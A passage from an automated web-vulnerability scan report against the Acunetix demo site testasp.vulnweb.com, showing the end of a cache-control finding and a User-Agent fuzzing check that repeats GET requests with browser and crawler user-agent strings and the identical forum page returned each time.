#BFFFBF; } .FramedForm { border-right: #008F00 1px solid; border-top: #008F00 1px solid; border-left: #008F00 1px solid; border-bottom: #008F00 1px solid; background-color: #BFFFBF; margin-top: 10px; margin-bottom: 10px; padding: 5px; } .tableheader { border-right: #008F00 1px solid; border-top: #008F00 1px solid; border-left: #008F00 1px solid; border-bottom: #008F00 1px solid; background-color: #008F00; color: #BFFFBF; font-weight: bold; } .forumtitle { font-size: 14px; font-weight: bold; text-transform: capitalize; color: #008F00; margin-top: 5px; margin-bottom: 5px; } .forumdescription { margin-left: 15px; } .userinfo { text-align: center; font-weight: bold; display: block; position: relative; width: 100px; } .post { border-top: 1px solid #008F00; border-right: 1px none #008F00; border-bottom: 1px none #008F00; border-left: 1px none #008F00; } .posttitle { border: 1px none #80FF80; background-color: #BFFFBF; font-weight: bold; margin-bottom: 15px; padding: 2px; } INPUT { border-width: 1px; border-style: solid; border-color: #00CC00 #006600 #006600 #00CC00; } TEXTAREA { border-width: 1px; border-style: solid; border-color: #00CC00 #006600 #006600 #00CC00; } INPUT.Login { width: 250px; } INPUT.postit { width: 450px; } TEXTAREA.postit { width: 450px; height: 300px; } .path { font-weight: bold; color: #006600; margin-top: 0px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; } INPUT.search { } |
| Instances | 8 |
| Solution |
Validate that the response does not contain sensitive, personal or user-specific information. If it does, consider the use of the following HTTP response headers, to limit, or prevent the content being stored and retrieved from the cache by another user:
Cache-Control: no-cache, no-store, must-revalidate, private
Pragma: no-cache
Expires: 0
This configuration directs both HTTP 1.0 and HTTP 1.1 compliant caching servers to not store the response, and to not retrieve the response (without validation) from the cache, in response to a similar request.
|
| Reference |
https://tools.ietf.org/html/rfc7234
https://tools.ietf.org/html/rfc7231 http://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html (obsoleted by rfc7234) |
| Tags | WSTG-v42-ATHN-06 |
| CWE Id | 524 |
| WASC Id | 13 |
| Plugin Id | 10049 |
|
Informational |
User Agent Fuzzer |
|---|---|
| Description |
Check for differences in response based on fuzzed User Agent (eg. mobile sites, access as a Search Engine Crawler). Compares the response statuscode and the hashcode of the response body with the original response.
|
| URL | http://testasp.vulnweb.com |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| Evidence | |
| Request Header - size: 196 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Pragma: no-cache Cache-Control: no-cache Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=HMJDKBOCFMGGBFPMLMMKDIKC; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:48 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) |
| Evidence | |
| Request Header - size: 196 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Pragma: no-cache Cache-Control: no-cache Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=GMJDKBOCBGMMFFOLNKKHCILP; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:48 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) |
| Evidence | |
| Request Header - size: 196 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Pragma: no-cache Cache-Control: no-cache Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=FMJDKBOCPEKHNBOAJJAMIKCO; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:47 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
| Evidence | |
| Request Header - size: 218 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Pragma: no-cache Cache-Control: no-cache Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=IMJDKBOCMBDHADMNIJMCMNJJ; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:48 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) |
| Evidence | |
| Request Header - size: 229 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Pragma: no-cache Cache-Control: no-cache Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=KMJDKBOCPBLFEENOAGJJMEMH; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:49 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 |
| Evidence | |
| Request Header - size: 287 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Pragma: no-cache Cache-Control: no-cache Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=LMJDKBOCEBJMPCMNCEDGALBC; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:49 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | msnbot/1.1 (+http://search.msn.com/msnbot.htm) |
| Evidence | |
| Request Header - size: 192 bytes. |
GET http://testasp.vulnweb.com HTTP/1.1
Host: testasp.vulnweb.com User-Agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 244 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 Set-Cookie: ASPSESSIONIDCQRDQBRC=JMJDKBOCPFJMAIMNKGAHODEL; path=/ X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:18:49 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>93</td><td>93</td><td>3/14/2022 8:17:05 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p 